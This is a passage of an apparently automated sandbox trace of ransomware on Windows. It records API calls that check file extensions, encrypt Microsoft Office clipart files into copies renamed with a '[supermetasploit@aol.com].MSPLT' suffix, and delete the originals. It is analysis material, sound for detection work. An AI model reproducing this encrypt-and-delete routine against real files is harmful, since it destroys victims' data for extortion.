lstrlenW (lpString=".ppt") returned 4 [0315.074] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.075] lstrlenW (lpString=".zip") returned 4 [0315.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.075] lstrlenW (lpString=".rar") returned 4 [0315.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.075] lstrlenW (lpString=".bz2") returned 4 [0315.075] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.075] lstrlenW (lpString=".7z") returned 3 [0315.075] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.075] lstrlenW (lpString=".dbf") returned 4 [0315.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.075] lstrlenW (lpString=".1cd") returned 4 [0315.075] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.075] lstrlenW (lpString=".jpg") returned 4 [0315.075] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.075] lstrlenW (lpString=".doc") returned 4 [0315.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0315.076] lstrlenW (lpString=".docx") returned 5 [0315.076] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0315.076] lstrlenW (lpString=".pdf") returned 4 [0315.076] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0315.076] lstrlenW (lpString=".xls") returned 4 [0315.076] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0315.076] lstrlenW (lpString=".xlsx") returned 5 [0315.076] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0315.076] lstrlenW (lpString=".ppt") returned 4 [0315.076] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0315.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.076] lstrlenW (lpString=".zip") returned 4 [0315.076] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0315.076] lstrlenW (lpString=".rar") returned 4 [0315.076] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0315.076] lstrlenW (lpString=".bz2") returned 4 [0315.076] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0315.076] lstrlenW (lpString=".7z") returned 3 [0315.076] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0315.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.076] lstrlenW (lpString=".dbf") returned 4 [0315.076] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0315.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.077] lstrlenW (lpString=".1cd") returned 4 [0315.077] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0315.077] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 68 [0315.077] lstrlenW (lpString=".jpg") returned 4 [0315.077] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0315.077] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0315.077] lstrlenW (lpString="CLIP.WMF") returned 8 [0315.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0315.213] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2262) returned 1 [0315.213] CloseHandle (hObject=0x530) returned 1 [0315.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf")) returned 0x220 [0315.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0316.411] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0316.411] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0316.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0317.277] GetLastError () returned 0x0 [0317.277] ReadFile (in: hFile=0x520, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x8d6, lpOverlapped=0x0) returned 1 [0317.320] WriteFile (in: hFile=0x3e4, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x8e0, lpOverlapped=0x0) returned 1 [0317.322] ReadFile (in: hFile=0x520, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0317.322] WriteFile (in: hFile=0x3e4, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xe4, lpOverlapped=0x0) returned 1 [0317.322] SetEndOfFile (hFile=0x3e4) returned 1 [0318.050] CloseHandle (hObject=0x3e4) returned 1 [0318.194] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0318.194] SetEndOfFile (hFile=0x520) returned 1 [0318.242] CloseHandle (hObject=0x520) returned 1 [0318.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0318.258] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf")) returned 1 [0318.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.259] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.259] lstrlenW (lpString=".doc") returned 4 [0318.259] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0318.259] lstrlenW (lpString=".docx") returned 5 [0318.260] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0318.260] lstrlenW (lpString=".pdf") returned 4 [0318.260] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0318.260] lstrlenW (lpString=".xls") returned 4 [0318.260] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0318.260] lstrlenW (lpString=".xlsx") returned 5 [0318.260] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0318.260] lstrlenW (lpString=".ppt") returned 4 [0318.260] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0318.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.260] lstrlenW (lpString=".zip") returned 4 [0318.260] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0318.260] lstrlenW (lpString=".rar") returned 4 [0318.260] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0318.260] lstrlenW (lpString=".bz2") returned 4 [0318.261] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0318.261] lstrlenW (lpString=".7z") returned 3 [0318.261] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0318.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.261] lstrlenW (lpString=".dbf") returned 4 [0318.261] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0318.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.261] lstrlenW (lpString=".1cd") returned 4 [0318.261] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0318.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.261] lstrlenW (lpString=".jpg") returned 4 [0318.261] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0318.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.261] lstrlenW (lpString=".doc") returned 4 [0318.261] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0318.261] lstrlenW (lpString=".docx") returned 5 [0318.261] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0318.261] lstrlenW (lpString=".pdf") returned 4 [0318.261] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0318.261] lstrlenW (lpString=".xls") returned 4 [0318.262] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0318.262] lstrlenW (lpString=".xlsx") returned 5 [0318.262] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0318.262] lstrlenW (lpString=".ppt") returned 4 [0318.262] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0318.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.262] lstrlenW (lpString=".zip") returned 4 [0318.262] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0318.262] lstrlenW (lpString=".rar") returned 4 [0318.262] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0318.262] lstrlenW (lpString=".bz2") returned 4 [0318.262] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0318.262] lstrlenW (lpString=".7z") returned 3 [0318.262] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0318.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.262] lstrlenW (lpString=".dbf") returned 4 [0318.262] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0318.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.262] lstrlenW (lpString=".1cd") returned 4 [0318.262] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0318.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0318.262] lstrlenW (lpString=".jpg") returned 4 [0318.262] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0318.263] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0318.263] lstrlenW (lpString="DD00255_.WMF") returned 12 [0318.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0318.264] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2690) returned 1 [0318.265] CloseHandle (hObject=0x520) returned 1 [0318.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf")) returned 0x220 [0318.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0318.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0318.265] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0318.266] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0318.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0318.276] GetLastError () returned 0x0 [0318.276] ReadFile (in: hFile=0x520, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xa82, lpOverlapped=0x0) returned 1 [0318.281] WriteFile (in: hFile=0x524, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xa90, lpOverlapped=0x0) returned 1 [0318.283] ReadFile (in: hFile=0x520, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0318.283] WriteFile (in: hFile=0x524, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0318.283] SetEndOfFile (hFile=0x524) returned 1 [0318.284] CloseHandle (hObject=0x524) returned 1 [0318.284] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0318.284] SetEndOfFile (hFile=0x520) returned 1 [0318.496] CloseHandle (hObject=0x520) returned 1 [0318.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0318.505] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf")) returned 1 [0318.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.518] lstrlenW (lpString=".doc") returned 4 [0318.518] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0318.518] lstrlenW (lpString=".docx") returned 5 [0318.518] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0318.518] lstrlenW (lpString=".pdf") returned 4 [0318.518] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0318.519] lstrlenW (lpString=".xls") returned 4 [0318.519] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0318.519] lstrlenW (lpString=".xlsx") returned 5 [0318.519] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0318.519] lstrlenW (lpString=".ppt") returned 4 [0318.519] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0318.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.519] lstrlenW (lpString=".zip") returned 4 [0318.519] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0318.519] lstrlenW (lpString=".rar") returned 4 [0318.519] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0318.519] lstrlenW (lpString=".bz2") returned 4 [0318.519] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0318.520] lstrlenW (lpString=".7z") returned 3 [0318.520] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0318.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.520] lstrlenW (lpString=".dbf") returned 4 [0318.520] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0318.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.520] lstrlenW (lpString=".1cd") returned 4 [0318.520] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0318.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.520] lstrlenW (lpString=".jpg") returned 4 [0318.520] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0318.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.521] lstrlenW (lpString=".doc") returned 4 [0318.521] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0318.521] lstrlenW (lpString=".docx") returned 5 [0318.521] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0318.521] lstrlenW (lpString=".pdf") returned 4 [0318.521] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0318.521] lstrlenW (lpString=".xls") returned 4 [0318.521] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0318.521] lstrlenW (lpString=".xlsx") returned 5 [0318.522] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0318.522] lstrlenW (lpString=".ppt") returned 4 [0318.522] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0318.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.522] lstrlenW (lpString=".zip") returned 4 [0318.522] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0318.522] lstrlenW (lpString=".rar") returned 4 [0318.522] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0318.522] lstrlenW (lpString=".bz2") returned 4 [0318.522] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0318.522] lstrlenW (lpString=".7z") returned 3 [0318.522] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0318.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.522] lstrlenW (lpString=".dbf") returned 4 [0318.522] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0318.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.522] lstrlenW (lpString=".1cd") returned 4 [0318.523] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0318.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF") returned 68 [0318.523] lstrlenW (lpString=".jpg") returned 4 [0318.523] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0318.523] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0318.523] lstrlenW (lpString="DD00256_.WMF") returned 12 [0318.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0318.526] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2832) returned 1 [0318.527] CloseHandle (hObject=0x520) returned 1 [0318.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf")) returned 0x220 [0318.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0318.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0318.529] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0318.529] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0318.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0318.531] GetLastError () returned 0x0 [0318.531] ReadFile (in: hFile=0x520, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xb10, lpOverlapped=0x0) returned 1 [0318.535] WriteFile (in: hFile=0x460, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xb20, lpOverlapped=0x0) returned 1 [0318.537] ReadFile (in: hFile=0x520, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0318.537] WriteFile (in: hFile=0x460, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0318.538] SetEndOfFile (hFile=0x460) returned 1 [0318.538] CloseHandle (hObject=0x460) returned 1 [0318.539] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0318.539] SetEndOfFile (hFile=0x520) returned 1 [0318.891] CloseHandle (hObject=0x520) returned 1 [0318.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.111] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf")) returned 1 [0319.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.112] lstrlenW (lpString=".doc") returned 4 [0319.112] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.112] lstrlenW (lpString=".docx") returned 5 [0319.112] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.112] lstrlenW (lpString=".pdf") returned 4 [0319.112] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.112] lstrlenW (lpString=".xls") returned 4 [0319.112] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.112] lstrlenW (lpString=".xlsx") returned 5 [0319.112] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.112] lstrlenW (lpString=".ppt") returned 4 [0319.112] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.112] lstrlenW (lpString=".zip") returned 4 [0319.112] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.112] lstrlenW (lpString=".rar") 